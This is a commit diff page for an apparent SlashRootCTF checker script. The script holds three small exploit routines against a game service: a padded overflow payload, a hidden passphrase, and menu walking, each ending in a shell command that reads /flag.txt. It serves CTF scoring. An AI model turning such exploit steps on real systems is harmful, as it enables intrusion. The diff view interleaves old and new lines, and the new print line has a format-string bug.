Ver a proveniência

update

master
myitinos há 5 anos
ascendente
cometimento
dc44c91c79
1 ficheiros alterados com 64 adições e 68 eliminações
  1. +64
    -68
      checker.py

+ 64
- 68
checker.py Ver ficheiro

@ -6,99 +6,95 @@ TOTAL_TEAMS = 1
FORMAT = "SlashRootCTF"
def run():
# return process(FILENAME)
return remote("127.0.0.1", 60204)
def poc0(host, port):
with remote(host, port) as p:
p.recvuntil(">")
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
msg = p.recvuntil(">")
# print(msg)
if "young" in msg:
p.sendline("y")
p.recvuntil(">")
p.sendline("2")
p.recvuntil(">")
p.sendline("4")
p.recvuntil(">")
p.sendline("y")
for _ in xrange(10):
p.recvuntil(">")
p.sendline("99")
p.sendline("cat /flag.txt")
flag = p.recvuntil("}")
# print flag
if FORMAT in flag:
return True
else:
return False
else:
return False
def poc0(host, port):
p = remote(host, port)
p.recvuntil(">")
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
msg = p.recvuntil(">")
# print(msg)
if "young" in msg:
p.sendline("y")
def poc1(host, port):
with remote(host, port) as p:
p.recvuntil(">")
p.sendline("2")
p.sendline("Leo")
p.recvuntil(">")
p.sendline("y")
for _ in range(2):
p.recvuntil(">")
p.sendline("3")
p.recvuntil(">")
p.sendline("0")
if "Who" in p.recvuntil(">"):
return False
p.sendline("y")
p.recvuntil(">")
p.sendline("1")
p.recvuntil(">")
p.sendline("4")
p.recvuntil(">")
p.sendline("y")
for _ in xrange(10):
for _ in range(10):
p.recvuntil(">")
p.sendline("99")
p.sendline("cat /flag.txt")
flag = p.recvuntil("}")
# print flag
if FORMAT in flag:
return True
else:
return False
else:
return False
def poc1(host, port):
p = remote(host, port)
p.recvuntil(">")
p.sendline("Leo")
p.recvuntil(">")
p.sendline("y")
for _ in range(2):
p.recvuntil(">")
p.sendline("3")
p.recvuntil(">")
p.sendline("0")
if "Who" in p.recvuntil(">"):
return False
p.sendline("y")
p.recvuntil(">")
p.sendline("1")
p.recvuntil(">")
p.sendline("4")
p.recvuntil(">")
p.sendline("y")
for _ in range(10):
p.recvuntil(">")
p.sendline("99")
p.sendline("cat /flag.txt")
flag = p.recvuntil("}")
if FORMAT in flag:
return True
else:
return False
def poc2(host, port):
p = remote(host, port)
p.recvuntil(">")
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
p.recvuntil(">")
p.sendline("y")
p.recvuntil(">")
p.sendline("6")
if "Lv: 1000000" in p.recvuntil(">"):
p.sendline("2")
with remote(host, port) as p:
p.recvuntil(">")
p.sendline("4")
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
p.recvuntil(">")
p.sendline("y")
for _ in xrange(10):
p.recvuntil(">")
p.sendline("6")
if "Lv: 1000000" in p.recvuntil(">"):
p.sendline("2")
p.recvuntil(">")
p.sendline("99")
p.sendline("cat /flag.txt")
flag = p.recvuntil("}")
if FORMAT in flag:
return True
p.sendline("4")
p.recvuntil(">")
p.sendline("y")
for _ in xrange(10):
p.recvuntil(">")
p.sendline("99")
p.sendline("cat /flag.txt")
flag = p.recvuntil("}")
if FORMAT in flag:
return True
else:
return False
else:
return False
else:
return False
if __name__ == "__main__":
for i in range(1, TOTAL_TEAMS+1):
print poc0(HOST, (60004 + (i*100)))
print poc1(HOST, (60004 + (i*100)))
print poc2(HOST, (60004 + (i*100)))
r0 = poc0(HOST, (60004 + (i*100)))
r1 = poc1(HOST, (60004 + (i*100)))
r2 = poc2(HOST, (60004 + (i*100)))
print("Team [{}] {} {} {}" % (i, r0, r1, r2))

Carregando…
Cancelar
Guardar